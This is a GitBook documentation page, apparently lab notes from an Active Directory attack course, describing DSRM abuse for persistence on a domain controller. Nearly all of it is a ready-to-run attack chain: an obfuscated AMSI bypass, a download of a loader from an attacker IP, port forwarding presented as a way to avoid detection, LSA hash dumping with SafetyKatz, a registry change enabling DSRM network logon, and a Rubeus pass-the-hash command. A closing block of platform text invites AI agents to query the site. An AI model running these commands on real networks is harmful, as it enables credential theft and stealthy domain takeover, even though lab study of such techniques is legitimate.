> For the complete documentation index, see [llms.txt](https://omar-4.gitbook.io/omar-docs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://omar-4.gitbook.io/omar-docs/attacks/dsrm-abuse.md).

# DSRM Abuse

**DSRM (Directory Services Restore Mode) Abuse** is a technique used by attackers to gain privileged access to a Domain Controller (DC) by abusing the **Directory Services Restore Mode** account, which is a local administrator account created during the installation of **Active Directory (AD)**.

* We can persist with administrative access on the DC once we have Domain Admin privileges by abusing the DSRM administrator. With the domain admin privileges obtained earlier, run the following commands on the DC to open a PowerShell remoting session. As always, remember that we could use other tools like SafetyKatz, BetterSafetyKatz etc.

```
winrs -r:dcorp-dc cmd
```

* ByPass the AMSI

```
S`eT-It`em ( 'V'+'aR' +  'IA' + (('b'+("{1}{0}"-f':1','lE'))+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f(('U'+'ti')+'l'),'A',('Am'+'si'),(('.'+'Man')+('ag'+'e')+('me'+'n')+'t.'),('u'+'to'+(("{1}{0}"-f 'io','mat')+'n.')),'s',(('Sys'+'t')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+('ms'+'i')),'d',('I'+('n'+'itF')+('a'+'ile'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+('t'+'at')),'i',(('N'+'on')+('Pu'+'bl')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

* Download the Loader.exe

```
iwr -UseBasicParsing http://172.16.100.89/Loader.exe -Outfile C:\Users\Public\Loader.exe
```

* Add Port forwarding to Avoid Detection

```
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.89
```

* Run the below Command to Dump the Administrator Hash

```
c:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe "lsadump::lsa /patch" "exit"
```

* The DSRM administrator is not allowed to logon to the DC from network. So we need to change the logon behavior for the account by modifying registry on the DC. We can do this as follows:

```
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
```

* Pth to get access to the DC

```
Rubeus.exe asktgt /user:administrator /rc4:af0686cc0ca8f04df42210c9ac980760 /domain:dollarcorp.moneycorp.local /dc:dcorp-dc /ptt
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://omar-4.gitbook.io/omar-docs/attacks/dsrm-abuse.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
